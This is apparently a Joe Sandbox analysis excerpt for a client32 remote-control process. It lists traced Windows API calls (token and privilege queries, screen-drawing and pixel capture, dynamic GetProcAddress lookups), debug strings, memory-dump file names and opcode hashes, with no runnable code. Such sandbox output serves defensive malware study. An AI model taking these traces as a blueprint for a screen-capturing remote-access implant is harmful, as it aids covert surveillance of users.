                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 689C7924
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 689C7937
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(?), ref: 689C7944
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DebugErrorLastOutputStringwsprintf
                                                                                                                                                                                                    • String ID: $(Httputil.c) Error %d reading HTTP response header$hbuf->data$httputil.c
                                                                                                                                                                                                    • API String ID: 605895956-769711038
                                                                                                                                                                                                    • Opcode ID: 661bb124a21c450e1744d0080218d045aee34d4bb4f5cc58d5e858806c6b90fe
                                                                                                                                                                                                    • Instruction ID: 81984667acd5c11688b5064316c9e2f4c198c6c48e4d7fbaeab11e1cfa7f5540
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 661bb124a21c450e1744d0080218d045aee34d4bb4f5cc58d5e858806c6b90fe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7541C779A00601AFD714DF68DD44E6BB7F8EF95319B40C82CE99A87641E731F805CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,BBC4A55B), ref: 11089427
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?), ref: 11089540
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 11089504
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$CurrentEnterErrorExitLastLeaveMessageProcessThreadwsprintf
                                                                                                                                                                                                    • String ID: !((dwAttr & EV_CANPOST) && !(dwEvent & EV_CANPOST))$!(dwEvent & EV_INTERNAL_AUTOREF)$..\ctl32\EVMNGR.cpp$bOk$queue
                                                                                                                                                                                                    • API String ID: 15733517-3192407146
                                                                                                                                                                                                    • Opcode ID: 2aacc6b71f2621278017e212fdfb650457c49b9024b24aed8d4968e913391440
                                                                                                                                                                                                    • Instruction ID: 8c4930c3779224970a64a0d24a005b11ffa0fea26eb6bb835e6f19940be3f5f1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2aacc6b71f2621278017e212fdfb650457c49b9024b24aed8d4968e913391440
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0141A375D0472AABD711DF59D880F9EBBF4AB84B14F008529F825A7341E734A504CBA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110B5F0: timeGetTime.WINMM ref: 1110B5FD
                                                                                                                                                                                                      • Part of subcall function 110F6220: GetACP.KERNEL32(023AB828,DBCS,Charset,932=*128), ref: 110F62AE
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032,?), ref: 1103B642
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 1103B64A
                                                                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 1103B657
                                                                                                                                                                                                    • SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 1103B663
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 1103B66C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pixel$ReleaseSleepTimetime
                                                                                                                                                                                                    • String ID: DoFlushOptimal, maxcb=%d, cb=%d, gcb=%d$View$limitcolorbits
                                                                                                                                                                                                    • API String ID: 766270992-1413253680
                                                                                                                                                                                                    • Opcode ID: d5852c839270aa23ef5ae38c366fd629fbc8cd0939447888d43a8d295bfa1ddf
                                                                                                                                                                                                    • Instruction ID: f16d89a374e4fe568ab7d55a1f425cdb876f14b981240f7c8f6700600d478685
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5852c839270aa23ef5ae38c366fd629fbc8cd0939447888d43a8d295bfa1ddf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31419535E0161E9FEF15CFA4CD95BFEB7A5EB84309F10416DE916A7280EB34A90087A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 1102732F
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 11027336
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 11027358
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 11027378
                                                                                                                                                                                                    • LookupPrivilegeNameA.ADVAPI32(00000000,00000004,?,?), ref: 11027399
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110273D6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Token$InformationProcess$CloseCurrentHandleLookupNameOpenPrivilege
                                                                                                                                                                                                    • String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s
                                                                                                                                                                                                    • API String ID: 3882383554-3275751932
                                                                                                                                                                                                    • Opcode ID: 2940cffd9fc0ad11125a7878449ee45fa6743832f7028ba3a3e61afa157e7425
                                                                                                                                                                                                    • Instruction ID: ade80763f836c408a2a1d446ea8312ce3e6dd7fa4b179276d35611dba123a850
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2940cffd9fc0ad11125a7878449ee45fa6743832f7028ba3a3e61afa157e7425
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D42176B5D0021AAFD710DFE4DC85EAFBBBDEF44704F108119EA15A7240D770A906CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 1114F203
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 1114F219
                                                                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 1114F2FF
                                                                                                                                                                                                    • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 1114F327
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1114F33B
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1114F361
                                                                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 1114F371
                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 1114F378
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 1114F387
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 602542589-0
                                                                                                                                                                                                    • Opcode ID: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
                                                                                                                                                                                                    • Instruction ID: f8b28bdea48ec2611b1f91f2bbafde9b68da4a4719e2569757cfb30afdba7c1c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7851DAF5E012299FDB60DF28CD8479DBBB9EF88604F5091EAE609E3240D7705A81CF59
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918F0), ref: 1100D3C4
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918E0), ref: 1100D3D8
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918D0), ref: 1100D3ED
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918C0), ref: 1100D401
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918B4), ref: 1100D415
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191894), ref: 1100D42A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191874), ref: 1100D43E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191864), ref: 1100D452
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191854), ref: 1100D467
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                                                                                    • Opcode ID: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
                                                                                                                                                                                                    • Instruction ID: 9f027eddd4dddc581f186f25ec93b792fa700742cd5a4619bf017c7ec0e1ed24
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B31BBB59122349FE706DBE4C8D5A76B7E9E34C758F00857AE93083248D7F4A881CFA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 110794B7
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 110794BE
                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 110795BD
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Rect$ClientErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$idata->pButtonInfo$m_hWnd
                                                                                                                                                                                                    • API String ID: 437338437-4014050597
                                                                                                                                                                                                    • Opcode ID: 7fefad6643fc5ac206fbfa3b762672b57d8a8b56631d28e1c354c15daeaa10ab
                                                                                                                                                                                                    • Instruction ID: 55a833a31570b9682aea0c7843cf32cf1838476ea70d83dcbde263135748afff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7fefad6643fc5ac206fbfa3b762672b57d8a8b56631d28e1c354c15daeaa10ab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC712275E0021A9FDB04CF58C8C0EAEB7B5FF88324F108659E955AB355EB30E941CBA4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,BBC4A55B,?,?,?), ref: 1106D0E2
                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ..\ctl32\Connect.cpp, xrefs: 1106D2AA
                                                                                                                                                                                                    • Deregister NC_CHATEX for conn=%s, q=%p, xrefs: 1106D0C5
                                                                                                                                                                                                    • erased=%d, idata->dead=%d, xrefs: 1106D293
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalEnterEventSection
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$Deregister NC_CHATEX for conn=%s, q=%p$erased=%d, idata->dead=%d
                                                                                                                                                                                                    • API String ID: 2291802058-2272698802
                                                                                                                                                                                                    • Opcode ID: 4c4459f730ece1a7db6b629c2ae3fc9ade6f363c06eb62c3d438a519b44550e4
                                                                                                                                                                                                    • Instruction ID: b22ba82a88fbe9628385044aa67eb00d20c4b44079c4ac5070634ae5489f2a97
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c4459f730ece1a7db6b629c2ae3fc9ade6f363c06eb62c3d438a519b44550e4
